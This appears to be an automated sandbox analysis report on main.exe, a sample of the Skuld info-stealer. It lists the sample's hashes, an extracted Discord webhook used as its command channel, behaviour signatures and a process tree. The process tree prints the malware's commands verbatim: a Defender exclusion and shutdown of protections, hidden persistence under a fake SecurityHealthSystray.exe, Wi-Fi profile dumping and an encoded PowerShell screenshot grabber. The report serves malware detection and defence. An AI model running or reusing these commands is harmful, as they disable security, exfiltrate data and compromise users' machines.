Analysis

  • max time kernel
    2s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-07-2024 10:27

General

  • Target

    main.exe

  • Size

    14.2MB

  • MD5

    a7ff933d1bfb48bbf39b5e8807145569

  • SHA1

    a966d06fbeb23c39f09a7ee7251088ec3c46dcbc

  • SHA256

    0b0e369545a120edd970764bc00967592840e824a985bc0939831a7f4e8e08b0

  • SHA512

    8a207f6630a4e01b80e0024be473f2787a29f34e8b92dcf05a997e5bb28dd6e98be1ef064e468bc6727e2f82c986b283d0dd953c040f33763853e9a4e5fecde4

  • SSDEEP

    196608:zQHHeieBRR+flfkA/BuVIbWrXi+DC/g+Pgb44m10Yda3BoI:zeHeNM/BXWrS9IqgcZ1ld8B

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1259455200851263528/WjTP7hRdsg9AYUt9Ne5yCsuzpPfcgbf_TXvjDqQyFr_y78pLqaKoKPUt0PJEm49lU8Kn

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    1⤵
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\main.exe
      2⤵
      • Views/modifies file attributes
      PID:3236
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4736
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:4764
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\main.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4480
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
        PID:4296
      • C:\Windows\System32\Wbem\wmic.exe
        wmic cpu get Name
        2⤵
          PID:4872
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2436
        • C:\Windows\System32\Wbem\wmic.exe
          wmic csproduct get UUID
          2⤵
            PID:936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            2⤵
              PID:1596
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              2⤵
                PID:4496
              • C:\Windows\system32\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                2⤵
                • Views/modifies file attributes
                PID:1580
              • C:\Windows\system32\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                2⤵
                • Views/modifies file attributes
                PID:2280
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                2⤵
                • Command and Scripting Interpreter: PowerShell
                PID:412
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yvdrvhoq\yvdrvhoq.cmdline"
                  3⤵
                    PID:2204
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFE7.tmp" "c:\Users\Admin\AppData\Local\Temp\yvdrvhoq\CSC8F555E2F6BF840F3A78B81DA64ADDCC8.TMP"
                      4⤵
                        PID:4948

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  cadef9abd087803c630df65264a6c81c

                  SHA1

                  babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                  SHA256

                  cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                  SHA512

                  7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  f0a41fc9c1123bb127e55ecc66c8f052

                  SHA1

                  57152411758fa3df2623cc8a4df6d9fea73652f8

                  SHA256

                  a4fe2be2c449e841f6a12d32114672b097fc1058b6f2971a03521220a0228745

                  SHA512

                  e3e967adac361ddcf8240cf641f3e77eacfefc61dec725b8ae12e6a94f7d2ebd937fb9eb3cd068a0b3d4306e163dc87773b322bc2dd8b7df93b8103d0e99a900

                • C:\Users\Admin\AppData\Local\Temp\RESAFE7.tmp

                  Filesize

                  1KB

                  MD5

                  5a85ef7ec607be3e869bf9a6471a1f15

                  SHA1

                  b6ab851f8176c527cb4664f220701dff995f4ea8

                  SHA256

                  685f57673d8921e55c3127cf0bf1662112a024d5ae28884eaadc2b2ad9a22bfa

                  SHA512

                  5e605603373ec3285d49a5237feeacf218f566c33b2bc75d87bdb447f4ecfa1b93b93d55c2854f24b814827bb455e865c75f9e4d8269a25476c7554d677bcf7f

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fqbsziy1.vkr.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\yvdrvhoq\yvdrvhoq.dll

                  Filesize

                  4KB

                  MD5

                  12be55e5a260aedb3398acb25aa41823

                  SHA1

                  5fcbd00dcda01133318fc1898906d3c81ae7e010

                  SHA256

                  221852c06f0e10fd89ae2ae4469ec3cafd22de6ab3fe097b2e034292d9cccee3

                  SHA512

                  acfa151ceaf7a0f14ff55683cbf6ee558f8b153959a07d88f820db4d5cacf683890824b0f25e75476f540cfc14f2b467d57cba6ac264074a807985d0f4eaccfb

                • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                  Filesize

                  14.2MB

                  MD5

                  a7ff933d1bfb48bbf39b5e8807145569

                  SHA1

                  a966d06fbeb23c39f09a7ee7251088ec3c46dcbc

                  SHA256

                  0b0e369545a120edd970764bc00967592840e824a985bc0939831a7f4e8e08b0

                  SHA512

                  8a207f6630a4e01b80e0024be473f2787a29f34e8b92dcf05a997e5bb28dd6e98be1ef064e468bc6727e2f82c986b283d0dd953c040f33763853e9a4e5fecde4

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  2KB

                  MD5

                  6e2386469072b80f18d5722d07afdc0b

                  SHA1

                  032d13e364833d7276fcab8a5b2759e79182880f

                  SHA256

                  ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                  SHA512

                  e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                • \??\c:\Users\Admin\AppData\Local\Temp\yvdrvhoq\CSC8F555E2F6BF840F3A78B81DA64ADDCC8.TMP

                  Filesize

                  652B

                  MD5

                  a8f93c20ab566e79a61c9ddbbc689e61

                  SHA1

                  76f6803eaa049fd28b9429e7750ca750cc83f7b6

                  SHA256

                  828b719888aca1a1a6775822f1739d162e6d1ebd8de3cf093c14b8b397f8df05

                  SHA512

                  52bba136cd5033505c30fb55524e5069da6074acf511419898455a019eda9e2cbc66bfc9019340728dc1893668b286bf7ac8d34cbfc2599a2c33905a842f8c60

                • \??\c:\Users\Admin\AppData\Local\Temp\yvdrvhoq\yvdrvhoq.0.cs

                  Filesize

                  1004B

                  MD5

                  c76055a0388b713a1eabe16130684dc3

                  SHA1

                  ee11e84cf41d8a43340f7102e17660072906c402

                  SHA256

                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                  SHA512

                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                • \??\c:\Users\Admin\AppData\Local\Temp\yvdrvhoq\yvdrvhoq.cmdline

                  Filesize

                  607B

                  MD5

                  56ba93fb69e65ecbbff75e22128f2d27

                  SHA1

                  1849f0074677cbc7657d286d7fb87c3dfba7374e

                  SHA256

                  c5acda4ddb237f7c40c316381b52050c9ad0b6761215c4ef8089e1d2ee7fae3d

                  SHA512

                  fce9eefbf952d97c27a5dc99064df0d3eb57a5e58882c888547b98d9f72d5b5b9939baec35ae8b5a038cf896298bdbb67bebe0ec64036bbf8161572269c29b36

                • memory/412-61-0x000001EDA7810000-0x000001EDA7818000-memory.dmp

                  Filesize

                  32KB

                • memory/4480-8-0x000001B37F3E0000-0x000001B37F402000-memory.dmp

                  Filesize

                  136KB